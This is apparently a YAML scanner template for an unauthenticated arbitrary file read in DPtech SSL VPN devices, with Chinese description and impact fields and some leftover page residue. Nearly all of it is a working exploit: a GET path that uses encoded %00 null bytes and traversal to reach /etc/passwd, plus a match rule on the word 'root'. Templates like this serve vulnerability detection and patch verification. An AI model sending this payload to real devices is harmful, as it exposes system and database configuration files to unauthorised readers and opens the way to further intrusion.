30 lines
1.5 KiB
YAML
30 lines
1.5 KiB
YAML
|
keyword: DPtech SSLVPN
|
|||
|
|
name: 迪普SSL VPN 任意文件读取
|
|||
|
|
description: | # 下一行可填写漏洞描述
|
|||
|
|
迪普SSL VPN 存在任意文件读取漏洞,未经身份验证攻击者可通过%00绕过补丁安全校验机制,读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
|
|||
|
|
requests: # 为空代表默认或者不启用
|
|||
|
|
path: "/.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2Fetc%2Fpasswd"
|
|||
|
|
method: GET
|
|||
|
|
headers:
|
|||
|
|
Accept: '*/*'
|
|||
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8
|
|||
|
|
Referer: https://www.baidu.com
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Connection: keep-alive
|
|||
|
|
body-raw: |- # 如果需要发送请求体,在下一行开始填写
|
|||
|
|
|
|||
|
|
|
|||
|
|
response:
|
|||
|
|
path: "" # 不填则默认接收此请求的响应包
|
|||
|
|
status-code: 200
|
|||
|
|
body: "root" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
|
|||
|
|
time: # 此处填写响应包响应时间,默认不启用
|
|||
|
|
headers:
|
|||
|
|
Server:
|
|||
|
|
Content-type:
|
|||
|
|
Content-length:
|
|||
|
|
Date:
|
|||
|
|
Connection:
|
|||
|
|
impact: | # 下一行可填写漏洞影响
|
|||
|
|
迪普SSL VPN 存在任意文件读取漏洞,未经身份验证攻击者可通过%00绕过补丁安全校验机制,读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
|